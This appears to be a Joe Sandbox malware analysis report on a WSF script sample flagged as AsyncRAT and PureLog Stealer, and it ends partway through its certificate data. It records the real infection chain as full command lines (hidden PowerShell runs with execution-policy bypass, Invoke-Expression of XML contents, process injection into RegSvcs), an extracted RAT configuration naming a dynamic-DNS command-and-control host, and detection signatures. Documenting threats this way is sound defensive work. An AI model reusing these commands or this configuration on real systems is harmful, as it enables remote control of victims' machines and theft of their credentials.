Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Summaryform_FXnbLLyKOJ.wsf

Overview

General Information

Sample name:Summaryform_FXnbLLyKOJ.wsf
Analysis ID:1409058
MD5:75dc4de3834d7a713ca0e33c3d1c9b1b
SHA1:7b197014208a3aadcadd571f4ced60eb4acbefdc
SHA256:f8a6ff7847a05d31933deb7386190372bbe6a8af3bfde04b757731341d9ac4a3
Infos:

Detection

AsyncRAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected BrowserPasswordDump
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Found suspicious ZIP file
Injects a PE file into a foreign processes
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4552 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3360 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 4044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • net.exe (PID: 5864 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net1.exe (PID: 5048 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 4232 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5024 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 2096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 1216 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • net.exe (PID: 1176 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net1.exe (PID: 6672 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • cmd.exe (PID: 1484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4156 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5068 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • net.exe (PID: 7104 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net1.exe (PID: 2304 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • cmd.exe (PID: 5484 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7092 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 5040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5968 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • net.exe (PID: 3872 cmdline: "C:\Windows\System32\net.exe" session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net1.exe (PID: 64 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3492 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Ports": ["6666"], "Server": ["shefonew07.ddns.net"], "Mutex": "AsyncMutex_dHCTyo6u65FEkSZ3", "Certificate": "MIIE8jCCAtqgAwIBAgIQALtCaF9C3Ol8vIur9qAjrTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMzA0MTkxMTQ3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJnGoh+Ar1ejdA22Ur4SFKIgjc0ItFMVf09tAJYF7cFm66X6fUQtfKnh71eCbqLblffwPYcr2IcjuVllER/+0/tU+t40RO8clP7uojuJsWxbAUwFxXFhB3RAIBcFzu4eZCFR/Zctz+SlC/lH2IgXyz6G+MnBDbIF0wWT3S7rG7WQ8AwcVK7gYHUSo+2LvDYLK87jGe+R/8Hf4OPq6BG9TQdS5JOlJxXpxRV7ftjci9hhjB+6wWqeYV/fRs3/p7eb3xTHWP8KTZ5GObe+LW5S2pzCKFDH8KBQBiluqEaXcQxVx7QjKfnqwj7PCyK8nPnjCUW25KQIXI3q79vpzeJxkLvzqJ/5MnN9Lx6MAz02Wwf3ojEer4z+mCqj+T/Pw3aqY8H5s61p74N2vjw9J9amtkzQWCdt2k/WItP6oCzM3Es0mMdoVVb13zRYwfRM9f3HR58UjMc0u/JRjoaWWjTsxe1LIXcuuNhS/g/x3XwQf56Bs1GDF2lJ7/lhKjJNqHeOHzt8c1SijpbGMhG84G97aVXFJbZVrYwwoV7k6yHh9AiDCM8yjWGrO5eT7aPVKc2Rvvo4f6RJ9+kKzA9ybo0uJLZUBEPd5InYikMA44CQJwkkAN6lRBRsSpIGJl5PnfFlro4bElJ5aJ1gFAbbJuE5ratwmpSMBPPRhxvf3/mb9Ie3AgMBAAGjMjAwMB0GA1UdDgQWBBQFys/i3rra/4Y1V2F007ifKj1MAzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBLstL+hu9sBpX+bqI6lUhFp8faCgkmi2H3qiIZYYNwBnkWaDkpip4cO50vzRtObZwQ592d4CsX1yMIMQqG9sgWGcQopN8p/OABcoUVl/5A8NTQX6rYzAhxPR11Xf/644GlYzouAJyXMISU1Qyhs8812gQiO5eW4fsaBHso0raKtPC7r4/3ZOgA5idaBJfD/kZ22X45AF0uC8b2M0I3QlPLdE/fCaqTdi/W4IS4rcC252Qyy3AkGnvaSz/S56mjdCtN1hBDn6vPoQHGrk4i6xT8jCIVll2leakz1D0XLqLYgTDQvLuEdB09vBKmNLZrkvru0NUr24BKTNWmrvH46zDl6IxIEhvbXg5Ak6l1ZOZAf6H3Hru9t7kLypcK+ednvVkvduOD6KaFxS/tNz4beJwUJaDXcVwN4TcFy8vFryz2qV7MlCNS6Yx3lcpPp6Yf6wQH/NEFIewDAyQX0QMLQBlomEH2fb7SxNGbtNQWVGJm6Mrub2IjdkIxMLw31qVTewr4yhAi310FGiH/SXw6FD38YI+x9T4fsI4Xqvt1K1kCePZsvSEGtGqUz5wIY7VIxIcGIGF/w4vG8Xs4L7qaH51LMkht+XoAWs9y1FLOAA1jjQ2DPdI7MmBIj0TUbhnGEnUU0hdMzQzBjJvA8oIkEfKwS7oYN1ZJk4JDZ/nGkEM/PQ==", "Server Signature": "jdAfMroNuxWW5Kigy48Cl6ea80yF1X+/9af0C/DbKkem2xPCpwp3LASD6xjO1tx3LQ5eOhRwHr6h9Bp+FrzIGZD/GjbyydyMYejz1eEnQbrHZzdO04P/xXT9LAM/sntbjRkbF3EtdhDUt+slLSPuPHZuJyadl43H54HiZyzvlT50FmvzERMAeN91gLj0fIJ+O8z/WHjVYZcYS06mC1B57qf6c264eozPvpy6Mac8WnjJx/SFJfOKGLrvMQCYu26FW8kZZ4vleRDCK4PpH62HrJa8s21tqWy6TcgNiiy3SD9F3wgfEXwRwB5I6ZnYIHP+QSyEM66RtypRaOUmOyOkoqlyIutxWbs3ISaJDoxURClcEqAQLe+mN6MGCnt4Y2ywLbfggQ6xmzA+uOfK/8rmib0/7bQbOlnroKHrcU/ygcy54qO4wvor/1GA2hV4YFUPBzRUIH748YVnVqFrHJUj+/AeBv/B++t2n/NYoQF6Zvhn2l6e+RMfzaIUYFYpEnhnoapaNOA2v71uiriVVoQywbz0u1LuWh+gXodgptcrVn44SpJcRU4XnHFFarHum2Sn4i3xZXXgYsOlIhCOWdfiw71lHCkicU7gGB7gDUC0G4d4UvnEgUBFNRvuT2hxSKnHu4Oq2XnHnOvD4vsP8Sk2DCEav/WxKKxWqHf3fReUJRw="}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x3d031:$x1: AsyncRAT
  • 0x3d06f:$x1: AsyncRAT

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x465b:$x1: AsyncRAT
  • 0x4699:$x1: AsyncRAT
00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x1835b:$x1: AsyncRAT
  • 0x18399:$x1: AsyncRAT
00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
    • 0x1e1e4:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
    • 0x21278:$a2: Stub.exe
    • 0x21308:$a2: Stub.exe
    • 0x1aa74:$a3: get_ActivatePong
    • 0x1e3fc:$a4: vmware
    • 0x1e274:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
    • 0x1ba0b:$a6: get_SslClient
    00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0x1e276:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    Click to see the 51 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    20.2.powershell.exe.13852e70000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      38.2.powershell.exe.2b31f7adac0.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        20.2.powershell.exe.1384aa71a78.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          38.2.powershell.exe.2b31f7adac0.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            20.2.powershell.exe.1384aa71a78.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 35 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4156, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 3816, ProcessName: RegSvcs.exe
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , ProcessId: 4044, ProcessName: wscript.exe
              Sigma detected: Powerup Write Hijack DLL
              Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3360, TargetFilename: C:\Users\Public\nKNmegHQBbmlQMTN.bat
              Sigma detected: Script Initiated Connection to Non-Local Network
              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 212.23.222.200, DestinationIsIpv6: false, DestinationPort: 222, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , ProcessId: 4044, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" , ProcessId: 4044, ProcessName: wscript.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4552, TargetFilename: C:\Users\Public\NDKJPlEEYLhKqtGW.xml
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'", CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4232, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'", ProcessId: 5024, ProcessName: powershell.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3360, TargetFilename: C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs
              Sigma detected: Script Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 212.23.222.200, DestinationIsIpv6: false, DestinationPort: 222, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", ProcessId: 4552, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4552, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command, ProcessId: 3360, ProcessName: powershell.exe
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3360, TargetFilename: C:\Users\Public\DnWEdFPemZvdtKRs.ps1
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2096, ProcessName: svchost.exe

              Snort Signatures

              Timestamp:03/14/24-16:35:17.108992
              SID:2035595
              Source Port:6666
              Destination Port:49711
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/14/24-16:35:17.108992
              SID:2030673
              Source Port:6666
              Destination Port:49711
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Found malware configuration
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Ports": ["6666"], "Server": ["shefonew07.ddns.net"], "Mutex": "AsyncMutex_dHCTyo6u65FEkSZ3", "Certificate": "MIIE8jCCAtqgAwIBAgIQALtCaF9C3Ol8vIur9qAjrTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMzA0MTkxMTQ3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJnGoh+Ar1ejdA22Ur4SFKIgjc0ItFMVf09tAJYF7cFm66X6fUQtfKnh71eCbqLblffwPYcr2IcjuVllER/+0/tU+t40RO8clP7uojuJsWxbAUwFxXFhB3RAIBcFzu4eZCFR/Zctz+SlC/lH2IgXyz6G+MnBDbIF0wWT3S7rG7WQ8AwcVK7gYHUSo+2LvDYLK87jGe+R/8Hf4OPq6BG9TQdS5JOlJxXpxRV7ftjci9hhjB+6wWqeYV/fRs3/p7eb3xTHWP8KTZ5GObe+LW5S2pzCKFDH8KBQBiluqEaXcQxVx7QjKfnqwj7PCyK8nPnjCUW25KQIXI3q79vpzeJxkLvzqJ/5MnN9Lx6MAz02Wwf3ojEer4z+mCqj+T/Pw3aqY8H5s61p74N2vjw9J9amtkzQWCdt2k/WItP6oCzM3Es0mMdoVVb13zRYwfRM9f3HR58UjMc0u/JRjoaWWjTsxe1LIXcuuNhS/g/x3XwQf56Bs1GDF2lJ7/lhKjJNqHeOHzt8c1SijpbGMhG84G97aVXFJbZVrYwwoV7k6yHh9AiDCM8yjWGrO5eT7aPVKc2Rvvo4f6RJ9+kKzA9ybo0uJLZUBEPd5InYikMA44CQJwkkAN6lRBRsSpIGJl5PnfFlro4bElJ5aJ1gFAbbJuE5ratwmpSMBPPRhxvf3/mb9Ie3AgMBAAGjMjAwMB0GA1UdDgQWBBQFys/i3rra/4Y1V2F007ifKj1MAzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBLstL+hu9sBpX+bqI6lUhFp8faCgkmi2H3qiIZYYNwBnkWaDkpip4cO50vzRtObZwQ592d4CsX1yMIMQqG9sgWGcQopN8p/OABcoUVl/5A8NTQX6rYzAhxPR11Xf/644GlYzouAJyXMISU1Qyhs8812gQiO5eW4fsaBHso0raKtPC7r4/3ZOgA5idaBJfD/kZ22X45AF0uC8b2M0I3QlPLdE/fCaqTdi/W4IS4rcC252Qyy3AkGnvaSz/S56mjdCtN1hBDn6vPoQHGrk4i6xT8j